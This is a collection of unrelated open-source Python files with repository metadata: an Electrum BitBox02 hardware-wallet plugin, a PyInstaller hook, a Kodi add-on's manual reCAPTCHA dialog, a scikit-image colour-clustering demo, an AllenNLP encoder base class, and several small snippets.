except bitbox02.DuplicateEntryException:
raise
except:
raise UserFacingException("Failed to register multisig\naccount configuration on BitBox02")
return multisig_config
@runs_in_hwd_thread
def show_address(
self, bip32_path: str, address_type: str, wallet: Deterministic_Wallet
) -> str:
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
address_keypath = bip32.convert_bip32_path_to_list_of_uint32(bip32_path)
coin_network = self.coin_network_from_electrum_network()
if address_type == "p2wpkh":
script_config = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH
)
elif address_type == "p2wpkh-p2sh":
script_config = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH_P2SH
)
elif address_type in ("p2wsh-p2sh", "p2wsh"):
if type(wallet) is Multisig_Wallet:
script_config = self.btc_multisig_config(
coin_network, address_keypath, wallet, address_type,
)
else:
raise Exception("Can only use p2wsh-p2sh or p2wsh with multisig wallets")
else:
raise Exception(
"invalid address xtype: {} is not supported by the BitBox02".format(
address_type
)
)
return self.bitbox02_device.btc_address(
keypath=address_keypath,
coin=coin_network,
script_config=script_config,
display=True,
)
def _get_coin(self):
return bitbox02.btc.TBTC if constants.net.TESTNET else bitbox02.btc.BTC
@runs_in_hwd_thread
def sign_transaction(
self,
keystore: Hardware_KeyStore,
tx: PartialTransaction,
wallet: Deterministic_Wallet,
):
if tx.is_complete():
return
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
coin = self._get_coin()
tx_script_type = None
# Build BTCInputType list
inputs = []
for txin in tx.inputs():
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path is None:
raise Exception(
"A wallet owned pubkey was not found in the transaction input to be signed"
)
prev_tx = txin.utxo
if prev_tx is None:
raise UserFacingException(_('Missing previous tx.'))
prev_inputs: List[bitbox02.BTCPrevTxInputType] = []
prev_outputs: List[bitbox02.BTCPrevTxOutputType] = []
for prev_txin in prev_tx.inputs():
prev_inputs.append(
{
"prev_out_hash": prev_txin.prevout.txid[::-1],
"prev_out_index": prev_txin.prevout.out_idx,
"signature_script": prev_txin.script_sig,
"sequence": prev_txin.nsequence,
}
)
for prev_txout in prev_tx.outputs():
prev_outputs.append(
{
"value": prev_txout.value,
"pubkey_script": prev_txout.scriptpubkey,
}
)
inputs.append(
{
"prev_out_hash": txin.prevout.txid[::-1],
"prev_out_index": txin.prevout.out_idx,
"prev_out_value": txin.value_sats(),
"sequence": txin.nsequence,
"keypath": full_path,
"script_config_index": 0,
"prev_tx": {
"version": prev_tx.version,
"locktime": prev_tx.locktime,
"inputs": prev_inputs,
"outputs": prev_outputs,
},
}
)
            if tx_script_type is None:
tx_script_type = txin.script_type
elif tx_script_type != txin.script_type:
raise Exception("Cannot mix different input script types")
if tx_script_type == "p2wpkh":
tx_script_type = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH
)
elif tx_script_type == "p2wpkh-p2sh":
tx_script_type = bitbox02.btc.BTCScriptConfig(
simple_type=bitbox02.btc.BTCScriptConfig.P2WPKH_P2SH
)
elif tx_script_type in ("p2wsh-p2sh", "p2wsh"):
if type(wallet) is Multisig_Wallet:
tx_script_type = self.btc_multisig_config(coin, full_path, wallet, tx_script_type)
else:
raise Exception("Can only use p2wsh-p2sh or p2wsh with multisig wallets")
else:
raise UserFacingException(
"invalid input script type: {} is not supported by the BitBox02".format(
tx_script_type
)
)
# Build BTCOutputType list
outputs = []
for txout in tx.outputs():
assert txout.address
# check for change
if txout.is_change:
my_pubkey, change_pubkey_path = keystore.find_my_pubkey_in_txinout(txout)
outputs.append(
bitbox02.BTCOutputInternal(
keypath=change_pubkey_path, value=txout.value, script_config_index=0,
)
)
else:
addrtype, pubkey_hash = bitcoin.address_to_hash(txout.address)
if addrtype == OnchainOutputType.P2PKH:
output_type = bitbox02.btc.P2PKH
elif addrtype == OnchainOutputType.P2SH:
output_type = bitbox02.btc.P2SH
elif addrtype == OnchainOutputType.WITVER0_P2WPKH:
output_type = bitbox02.btc.P2WPKH
elif addrtype == OnchainOutputType.WITVER0_P2WSH:
output_type = bitbox02.btc.P2WSH
else:
raise UserFacingException(
"Received unsupported output type during transaction signing: {} is not supported by the BitBox02".format(
addrtype
)
)
outputs.append(
bitbox02.BTCOutputExternal(
output_type=output_type,
output_hash=pubkey_hash,
value=txout.value,
)
)
keypath_account = full_path[:-2]
sigs = self.bitbox02_device.btc_sign(
coin,
[bitbox02.btc.BTCScriptConfigWithKeypath(
script_config=tx_script_type,
keypath=keypath_account,
)],
inputs=inputs,
outputs=outputs,
locktime=tx.locktime,
version=tx.version,
)
# Fill signatures
if len(sigs) != len(tx.inputs()):
raise Exception("Incorrect number of inputs signed.") # Should never occur
signatures = [bh2u(ecc.der_sig_from_sig_string(x[1])) + "01" for x in sigs]
tx.update_signatures(signatures)
def sign_message(self, keypath: str, message: bytes, xtype: str) -> bytes:
if self.bitbox02_device is None:
raise Exception(
"Need to setup communication first before attempting any BitBox02 calls"
)
try:
simple_type = {
"p2wpkh-p2sh":bitbox02.btc.BTCScriptConfig.P2WPKH_P2SH,
"p2wpkh": bitbox02.btc.BTCScriptConfig.P2WPKH,
}[xtype]
except KeyError:
raise UserFacingException("The BitBox02 does not support signing messages for this address type: {}".format(xtype))
_, _, signature = self.bitbox02_device.btc_sign_msg(
self._get_coin(),
bitbox02.btc.BTCScriptConfigWithKeypath(
script_config=bitbox02.btc.BTCScriptConfig(
simple_type=simple_type,
),
keypath=bip32.convert_bip32_path_to_list_of_uint32(keypath),
),
message,
)
return signature
class BitBox02_KeyStore(Hardware_KeyStore):
hw_type = "bitbox02"
device = "BitBox02"
plugin: "BitBox02Plugin"
def __init__(self, d: dict):
super().__init__(d)
self.force_watching_only = False
self.ux_busy = False
def get_client(self):
return self.plugin.get_client(self)
def give_error(self, message: Exception, clear_client: bool = False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(
_(
"Message encryption, decryption and signing are currently not supported for {}"
).format(self.device)
)
def sign_message(self, sequence, message, password):
if password:
raise Exception("BitBox02 does not accept a password from the host")
client = self.get_client()
keypath = self.get_derivation_prefix() + "/%d/%d" % sequence
xtype = self.get_bip32_node_for_xpub().xtype
return client.sign_message(keypath, message.encode("utf-8"), xtype)
@runs_in_hwd_thread
def sign_transaction(self, tx: PartialTransaction, password: str):
if tx.is_complete():
return
client = self.get_client()
assert isinstance(client, BitBox02Client)
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction(self, tx, self.handler.get_wallet())
finally:
self.handler.finished()
except Exception as e:
self.logger.exception("")
self.give_error(e, True)
return
@runs_in_hwd_thread
def show_address(
self, sequence: Tuple[int, int], txin_type: str, wallet: Deterministic_Wallet
):
client = self.get_client()
address_path = "{}/{}/{}".format(
self.get_derivation_prefix(), sequence[0], sequence[1]
)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, txin_type, wallet)
finally:
self.handler.finished()
except Exception as e:
self.logger.exception("")
self.handler.show_error(e)
class BitBox02Plugin(HW_PluginBase):
keystore_class = BitBox02_KeyStore
minimum_library = (5, 2, 0)
DEVICE_IDS = [(0x03EB, 0x2403)]
SUPPORTED_XTYPES = ("p2wpkh-p2sh", "p2wpkh", "p2wsh", "p2wsh-p2sh")
def __init__(self, parent: HW_PluginBase, config: SimpleConfig, name: str):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS, plugin=self)
def get_library_version(self):
try:
from bitbox02 import bitbox02
version = bitbox02.__version__
except:
version = "unknown"
if requirements_ok:
return version
else:
raise ImportError()
# handler is a BitBox02_Handler
@runs_in_hwd_thread
def create_client(self, device: Device, handler: Any) -> BitBox02Client:
if not handler:
self.handler = handler
return BitBox02Client(handler, device, self.config, plugin=self)
def setup_device(
self, device_info: DeviceInfo, wizard: BaseWizard, purpose: int
):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
assert isinstance(client, BitBox02Client)
if client.bitbox02_device is None:
wizard.run_task_without_blocking_gui(
task=lambda client=client: client.pairing_dialog())
client.fail_if_not_initialized()
return client
def get_xpub(
self, device_id: str, derivation: str, xtype: str, wizard: BaseWizard
):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(
_("This type of script is not supported with {}: {}").format(self.device, xtype)
)
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
assert isinstance(client, BitBox02Client)
assert client.bitbox02_device is not None
return client.get_xpub(derivation, xtype)
@runs_in_hwd_thread
def show_address(
self,
wallet: Deterministic_Wallet,
address: str,
keystore: BitBox02_KeyStore = None,
):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
txin_type = wallet.get_txin_type(address)
sequence = wallet.get_address_index(address)
keystore.show_address(sequence, txin_type, wallet)
@runs_in_hwd_thread
def show_xpub(self, keystore: BitBox02_KeyStore):
client = keystore.get_client()
assert isinstance(client, BitBox02Client)
derivation = keystore.get_derivation_prefix()
xtype = keystore.get_bip32_node_for_xpub().xtype
client.get_xpub(derivation, xtype, display=True)
def create_device_from_hid_enumeration(self, d: dict, *, product_key) -> 'Device':
device = super().create_device_from_hid_enumeration(d, product_key=product_key)
# The BitBox02's product_id is not unique per device, thus use the path instead to
# distinguish devices.
id_ = str(d['path'])
return device._replace(id_=id_)
|
GroestlCoin/electrum-grs
|
electrum_grs/plugins/bitbox02/bitbox02.py
|
Python
|
gpl-3.0
| 27,314 | 0.002123 |
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
"""
Import hook for PyGObject's "gi.repository.Champlain" package.
"""
from PyInstaller.utils.hooks import get_gi_typelibs
binaries, datas, hiddenimports = get_gi_typelibs('Champlain', '0.12')
|
etherkit/OpenBeacon2
|
macos/venv/lib/python3.8/site-packages/PyInstaller/hooks/hook-gi.repository.Champlain.py
|
Python
|
gpl-3.0
| 702 | 0.002849 |
# -*- coding: utf-8 -*-
"""
@author: kevinhikali
@email: hmingwei@gmail.com
"""
import tensorflow as tf
A = [[1, 2, 3, 4]]
B = [[2, 2, 3, 4]]
casted = tf.cast(tf.equal(A, B), dtype='float32')
with tf.Session() as sess:
print(sess.run(casted))
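    # Expected output: [[0. 1. 1. 1.]] -- element-wise equality of A and B cast to float32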
|
kevinhikali/ml_kevin
|
tf/tf_cast.py
|
Python
|
gpl-3.0
| 250 | 0 |
from unittest2 import TestCase, skip
from bsPlugins.Annotate import AnnotatePlugin
import os
path = 'testing_files/'
class Test_AnnotatePlugin(TestCase):
def setUp(self):
self.plugin = AnnotatePlugin()
def test_with_signals(self):
self.plugin(**{'track':path+'KO50.bedGraph', 'assembly':'mm9',
'promoter':0, 'intergenic':0, 'UTR':0})
with open(self.plugin.output_files[0][0],'rb') as f:
content = f.readlines()
self.assertEqual(len(content),50)
def tearDown(self):
for f in os.listdir('.'):
if f.startswith('tmp'):
os.system("rm -rf %s" % f)
# nosetests --logging-filter=-tw2 test_Annotate.py
|
bbcf/bsPlugins
|
tests/test_Annotate.py
|
Python
|
gpl-3.0
| 717 | 0.011158 |
# -*- coding: utf-8 -*-
import random
import re
import time
import urlparse, urllib,urllib2,cookielib
from base64 import b64encode
import xbmc
import xbmcgui,xbmcaddon,os
__scriptID__ = 'plugin.video.live.magellan'
__addon__ = xbmcaddon.Addon(__scriptID__)
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "background.png"
check_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_checked.png"
uncheck_image = os.path.join( __addon__.getAddonInfo('path'), 'Images/' ) + "trans_unchecked1.png"
self.ctrlBackgound = xbmcgui.ControlImage(
0,0,
1280, 720,
bg_image
)
self.cancelled=False
self.addControl (self.ctrlBackgound)
self.msg = kwargs.get('msg')+'\nNormally there are 3-4 selections and 2 rounds of pictures'
self.round=kwargs.get('round')
self.strActionInfo = xbmcgui.ControlLabel(335, 120, 700, 300, self.msg, 'font13', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.strActionInfo = xbmcgui.ControlLabel(335, 20, 724, 400, 'Captcha round %s'%(str(self.round)), 'font40', '0xFFFF00FF')
self.addControl(self.strActionInfo)
self.cptloc = kwargs.get('captcha')
#self.img = xbmcgui.ControlImage(335,200,624,400,self.cptloc)
imgw=400
imgh=300
imgX=335
imgY=200
pw=imgw/3
ph=imgh/3
self.img = xbmcgui.ControlImage(imgX,imgY,imgw,imgh,self.cptloc)
self.addControl(self.img)
self.chk=[0]*9
self.chkbutton=[0]*9
self.chkstate=[False]*9
#self.chk[0] = xbmcgui.ControlCheckMark(335,200,200,200,'select',checkWidth=30, checkHeight=30)
self.chk[0]= xbmcgui.ControlImage(imgX,imgY, pw, ph,check_image)# '', font='font1',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[1]= xbmcgui.ControlImage(imgX+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[2]= xbmcgui.ControlImage(imgX+pw+pw,imgY, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[3]= xbmcgui.ControlImage(imgX,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[4]= xbmcgui.ControlImage(imgX+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[5]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[6]= xbmcgui.ControlImage(imgX,imgY+ph+ph, pw, ph,check_image)#, '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[7]= xbmcgui.ControlImage(imgX+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chk[8]= xbmcgui.ControlImage(imgX+pw+pw,imgY+ph+ph, pw, ph,check_image)# '', font='font14',focusTexture=check_image ,noFocusTexture=uncheck_image,checkWidth=220,checkHeight=150)
self.chkbutton[0]= xbmcgui.ControlButton(imgX,imgY, pw, ph, '1', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[1]= xbmcgui.ControlButton(imgX+pw,imgY, pw, ph, '2', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[2]= xbmcgui.ControlButton(imgX+pw+pw,imgY, pw, ph, '3', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[3]= xbmcgui.ControlButton(imgX,imgY+ph, pw, ph, '4', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[4]= xbmcgui.ControlButton(imgX+pw,imgY+ph, pw, ph, '5', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[5]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph, pw, ph, '6', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[6]= xbmcgui.ControlButton(imgX,imgY+ph+ph, pw, ph, '7', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[7]= xbmcgui.ControlButton(imgX+pw,imgY+ph+ph, pw, ph, '8', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
self.chkbutton[8]= xbmcgui.ControlButton(imgX+pw+pw,imgY+ph+ph, pw, ph, '9', font='font1');#,focusTexture=check_image ,noFocusTexture=uncheck_image);#,checkWidth=220,checkHeight=150)
for obj in self.chk:
self.addControl(obj )
obj.setVisible(False)
for obj in self.chkbutton:
self.addControl(obj )
#self.chk[0].setSelected(False)
self.cancelbutton = xbmcgui.ControlButton(imgX+(imgw/2)-110,imgY+imgh+10,100,40,'Cancel',alignment=2)
self.okbutton = xbmcgui.ControlButton(imgX+(imgw/2)+10,imgY+imgh+10,100,40,'OK',alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
self.chkbutton[6].controlDown(self.cancelbutton); self.chkbutton[6].controlUp(self.chkbutton[3])
self.chkbutton[7].controlDown(self.cancelbutton); self.chkbutton[7].controlUp(self.chkbutton[4])
self.chkbutton[8].controlDown(self.okbutton); self.chkbutton[8].controlUp(self.chkbutton[5])
self.chkbutton[6].controlLeft(self.chkbutton[8]);self.chkbutton[6].controlRight(self.chkbutton[7]);
self.chkbutton[7].controlLeft(self.chkbutton[6]);self.chkbutton[7].controlRight(self.chkbutton[8]);
self.chkbutton[8].controlLeft(self.chkbutton[7]);self.chkbutton[8].controlRight(self.chkbutton[6]);
self.chkbutton[3].controlDown(self.chkbutton[6]); self.chkbutton[3].controlUp(self.chkbutton[0])
self.chkbutton[4].controlDown(self.chkbutton[7]); self.chkbutton[4].controlUp(self.chkbutton[1])
self.chkbutton[5].controlDown(self.chkbutton[8]); self.chkbutton[5].controlUp(self.chkbutton[2])
self.chkbutton[3].controlLeft(self.chkbutton[5]);self.chkbutton[3].controlRight(self.chkbutton[4]);
self.chkbutton[4].controlLeft(self.chkbutton[3]);self.chkbutton[4].controlRight(self.chkbutton[5]);
self.chkbutton[5].controlLeft(self.chkbutton[4]);self.chkbutton[5].controlRight(self.chkbutton[3]);
self.chkbutton[0].controlDown(self.chkbutton[3]); self.chkbutton[0].controlUp(self.cancelbutton)
self.chkbutton[1].controlDown(self.chkbutton[4]); self.chkbutton[1].controlUp(self.cancelbutton)
self.chkbutton[2].controlDown(self.chkbutton[5]); self.chkbutton[2].controlUp(self.okbutton)
self.chkbutton[0].controlLeft(self.chkbutton[2]);self.chkbutton[0].controlRight(self.chkbutton[1]);
self.chkbutton[1].controlLeft(self.chkbutton[0]);self.chkbutton[1].controlRight(self.chkbutton[2]);
self.chkbutton[2].controlLeft(self.chkbutton[1]);self.chkbutton[2].controlRight(self.chkbutton[0]);
self.cancelled=False
self.setFocus(self.okbutton)
self.okbutton.controlLeft(self.cancelbutton);self.okbutton.controlRight(self.cancelbutton);
self.cancelbutton.controlLeft(self.okbutton); self.cancelbutton.controlRight(self.okbutton);
self.okbutton.controlDown(self.chkbutton[2]);self.okbutton.controlUp(self.chkbutton[8]);
self.cancelbutton.controlDown(self.chkbutton[0]); self.cancelbutton.controlUp(self.chkbutton[6]);
#self.kbd = xbmc.Keyboard()
def get(self):
self.doModal()
#self.kbd.doModal()
#if (self.kbd.isConfirmed()):
# text = self.kbd.getText()
# self.close()
# return text
#xbmc.sleep(5000)
self.close()
if not self.cancelled:
retval=""
for objn in range(9):
if self.chkstate[objn]:#self.chk[objn].getSelected() :
retval+=("" if retval=="" else ",")+str(objn)
return retval
else:
return ""
# def onControl(self,control):
# if control == self.okbutton:
# self.close()
# elif control == self.cancelbutton:
# self.cancelled=True
# self.close()
def anythingChecked(self):
for obj in self.chkstate:
if obj:#obj.getSelected():
return True
return False
def onControl(self,control):
if control==self.okbutton:
if self.anythingChecked():
self.close()
elif control== self.cancelbutton:
self.cancelled=True
self.close()
try:
#print control
if 'xbmcgui.ControlButton' in repr(type(control)):
index=control.getLabel()
#print 'index',index
if index.isnumeric():
#print 'index2',index
#self.chk[int(index)-1].setSelected(not self.chk[int(index)-1].getSelected())
self.chkstate[int(index)-1]= not self.chkstate[int(index)-1]
self.chk[int(index)-1].setVisible(self.chkstate[int(index)-1])
#print 'ddone'
except: pass
# def onClick(self, controlId):
# print 'CLICKED',controlId
def onAction(self, action):
if action == 10:#ACTION_PREVIOUS_MENU:
self.cancelled=True
self.close()
def getUrl(url, cookieJar=None,post=None, timeout=20, headers=None, noredir=False):
cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
if noredir:
opener = urllib2.build_opener(NoRedirection,cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
else:
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
#opener = urllib2.install_opener(opener)
req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
if headers:
for h,hv in headers:
req.add_header(h,hv)
response = opener.open(req,post,timeout=timeout)
link=response.read()
response.close()
return link;
class UnCaptchaReCaptcha:
def processCaptcha(self, key,lang):
headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
("Referer", "https://www.google.com/recaptcha/api2/demo"),
("Accept-Language", lang)];
html=getUrl("http://www.google.com/recaptcha/api/fallback?k=" + key,headers=headers);
token=""
round=0
while True:
payload = re.findall("\"(/recaptcha/api2/payload[^\"]+)",html);
round+=1
message =re.findall("<label .*?class=\"fbc-imageselect-message-text\">(.*?)</label>",html);
if len(message)==0:
message =re.findall("<div .*?class=\"fbc-imageselect-message-error\">(.*?)</div>",html)
if len(message)==0:
token = re.findall("\"this\\.select\\(\\)\">(.*?)</textarea>",html)[0];
if not token=="":
line1 = "Captcha Sucessfull"
xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
else:
line1 = "Captcha failed"
xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%('LSPro',line1, 3000, None))
break
else:
message=message[0]
payload=payload[0]
imgurl=re.findall("name=\"c\"\\s+value=\\s*\"([^\"]+)",html)[0]
headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
("Referer", "http://www.google.com/recaptcha/api/fallback?k=" + key),
("Accept-Language", lang)];
cval=re.findall('name="c" value="(.*?)"',html)[0]
captcha_imgurl = "https://www.google.com"+payload.replace('&','&')
#print message
message=message.replace('<strong>','')
message=message.replace('</strong>','')
#captcha_response=raw_input('-->')
oSolver = cInputWindow(captcha = captcha_imgurl,msg = message,round=round)
captcha_response = oSolver.get()
#print 'captcha_response',captcha_response
if captcha_response=="":
break
responses=""
for rr in captcha_response.split(','):
responses += "&response=" + rr;
html = getUrl("http://www.google.com/recaptcha/api/fallback?k="+key
,post=urllib.urlencode({'c' : cval,})+responses,headers=headers)#.decode('unicode-escape')
#print html
return token
def performCaptcha(sitename,cj,returnpage=True,captcharegex='data-sitekey="(.*?)"',lang="en",headers=None):
sitepage=getUrl(sitename,cookieJar=cj,headers=headers)
sitekey=re.findall(captcharegex,sitepage)
token=""
if len(sitekey)>=1:
c=UnCaptchaReCaptcha()
token=c.processCaptcha(sitekey[0],lang)
if returnpage:
if headers==None:
headers=[("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"),
("Referer", sitename)];
else:
headers+=[("Referer", sitename)]
sitepage=getUrl(sitename,cookieJar=cj,post=urllib.urlencode({"g-recaptcha-response":token}),headers=headers)
if returnpage:
return sitepage
else:
return token
#cookieJar = cookielib.LWPCookieJar()
#performCaptcha("http://www.livetv.tn/",cookieJar);
|
mrquim/mrquimrepo
|
repo/plugin.video.live.magellan/unCaptcha.py
|
Python
|
gpl-2.0
| 14,966 | 0.029467 |
# Auto-clustering, suggested by Matt Terry
from skimage import io, color, exposure
from sklearn import cluster, preprocessing
import numpy as np
import matplotlib.pyplot as plt
url = 'http://blogs.mathworks.com/images/steve/2010/mms.jpg'
import os
if not os.path.exists('mm.jpg'):
print("Downloading M&M's...")
from urllib.request import urlretrieve
urlretrieve(url, 'mm.jpg')
print("Image I/O...")
mm = io.imread('mm.jpg')
mm_lab = color.rgb2lab(mm)
ab = mm_lab[..., 1:]
print("Mini-batch K-means...")
X = ab.reshape(-1, 2)
kmeans = cluster.MiniBatchKMeans(n_clusters=6)
y = kmeans.fit(X).labels_
labels = y.reshape(mm.shape[:2])
N = labels.max()
def no_ticks(ax):
ax.set_xticks([])
ax.set_yticks([])
# Display all clusters
for i in range(N):
mask = (labels == i)
mm_cluster = mm_lab.copy()
mm_cluster[..., 1:][~mask] = 0
ax = plt.subplot2grid((2, N), (1, i))
ax.imshow(color.lab2rgb(mm_cluster))
no_ticks(ax)
ax = plt.subplot2grid((2, N), (0, 0), colspan=2)
ax.imshow(mm)
no_ticks(ax)
# Display histogram
L, a, b = mm_lab.T
left, right = -100, 100
bins = np.arange(left, right)
H, x_edges, y_edges = np.histogram2d(a.flatten(), b.flatten(), bins,
                                     density=True)
ax = plt.subplot2grid((2, N), (0, 2))
H_bright = exposure.rescale_intensity(H, in_range=(0, 5e-4))
ax.imshow(H_bright,
extent=[left, right, right, left], cmap=plt.cm.gray)
ax.set_title('Histogram')
ax.set_xlabel('b')
ax.set_ylabel('a')
# Voronoi diagram
mid_bins = bins[:-1] + 0.5
L = len(mid_bins)
yy, xx = np.meshgrid(mid_bins, mid_bins)
Z = kmeans.predict(np.column_stack([xx.ravel(), yy.ravel()]))
Z = Z.reshape((L, L))
ax = plt.subplot2grid((2, N), (0, 3))
ax.imshow(Z, interpolation='nearest',
extent=[left, right, right, left],
cmap=plt.cm.Spectral, alpha=0.8)
ax.imshow(H_bright, alpha=0.2,
extent=[left, right, right, left],
cmap=plt.cm.gray)
ax.set_title('Clustered histogram')
no_ticks(ax)
plt.show()
|
scikit-image/skimage-demos
|
mm_color_cluster.py
|
Python
|
bsd-3-clause
| 2,030 | 0.000985 |
from allennlp.modules.encoder_base import _EncoderBase
from allennlp.common import Registrable
class Seq2VecEncoder(_EncoderBase, Registrable):
"""
A `Seq2VecEncoder` is a `Module` that takes as input a sequence of vectors and returns a
single vector. Input shape : `(batch_size, sequence_length, input_dim)`; output shape:
`(batch_size, output_dim)`.
We add two methods to the basic `Module` API: `get_input_dim()` and `get_output_dim()`.
You might need this if you want to construct a `Linear` layer using the output of this encoder,
or to raise sensible errors for mis-matching input dimensions.
"""
def get_input_dim(self) -> int:
"""
Returns the dimension of the vector input for each element in the sequence input
to a `Seq2VecEncoder`. This is `not` the shape of the input tensor, but the
last element of that shape.
"""
raise NotImplementedError
def get_output_dim(self) -> int:
"""
Returns the dimension of the final vector output by this `Seq2VecEncoder`. This is `not`
the shape of the returned tensor, but the last element of that shape.
"""
raise NotImplementedError
|
allenai/allennlp
|
allennlp/modules/seq2vec_encoders/seq2vec_encoder.py
|
Python
|
apache-2.0
| 1,215 | 0.005761 |
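To make the get_input_dim/get_output_dim contract described in the docstring concrete, here is a hedged sketch of a minimal mean-pooling subclass; the class and its 'mean-pool' registration name are hypothetical illustrations, not part of AllenNLP:
import torch
from allennlp.modules.seq2vec_encoders.seq2vec_encoder import Seq2VecEncoder
@Seq2VecEncoder.register("mean-pool")  # hypothetical name, for illustration only
class MeanPoolEncoder(Seq2VecEncoder):
    """Averages over the time axis: (batch, time, dim) -> (batch, dim)."""
    def __init__(self, embedding_dim: int) -> None:
        super().__init__()
        self._embedding_dim = embedding_dim
    def get_input_dim(self) -> int:
        return self._embedding_dim
    def get_output_dim(self) -> int:
        return self._embedding_dim
    def forward(self, tokens: torch.Tensor, mask: torch.Tensor = None) -> torch.Tensor:
        if mask is None:
            return tokens.mean(dim=1)
        mask = mask.unsqueeze(-1).float()
        return (tokens * mask).sum(dim=1) / mask.sum(dim=1).clamp(min=1.0)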
from .main import main
# run the program
if __name__ == '__main__':
main()
|
william-fiset/Survival
|
__init__.py
|
Python
|
apache-2.0
| 79 | 0.012658 |
def sum_diagonal_principal(matrix):
return sum(matrix[i][i] for i in range(len(matrix)))
def sum_diagonal_secondary(matrix):
return sum(matrix[i][-i-1] for i in range(len(matrix)))
def diagonal(matrix):
s1 = sum_diagonal_principal(matrix)
s2 = sum_diagonal_secondary(matrix)
return "Principal Diagonal win!" if s1 > s2 else "Secondary Diagonal win!" if s1 < s2 else "Draw!"
|
SelvorWhim/competitive
|
Codewars/PrincipalDiagonalVsSecondaryDiagonal.py
|
Python
|
unlicense
| 396 | 0.007576 |
AUTH_URL = "https://quality.hubwoo.com/rest/auth/latest/session"
|
AlexWPerfComm/Python-JIRA
|
const/Constants.py
|
Python
|
mit
| 65 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
author: Alex Apostoli
based on https://github.com/hkm95/python-multiwii
which is under GPLv3
"""
import struct
import time
import sys
import re
class MSPItem:
def __init__(self, name, fmt, fields):
self.name = name
self.format = fmt
self.fields = fields
if not isinstance(self.format, list):
self.format = [self.format]
self.fields = [self.fields]
